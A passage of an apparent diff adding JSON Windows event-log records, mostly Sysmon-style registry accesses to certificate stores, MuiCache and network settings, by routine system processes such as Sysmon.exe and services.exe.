"Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848550000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": 
"LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848710000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
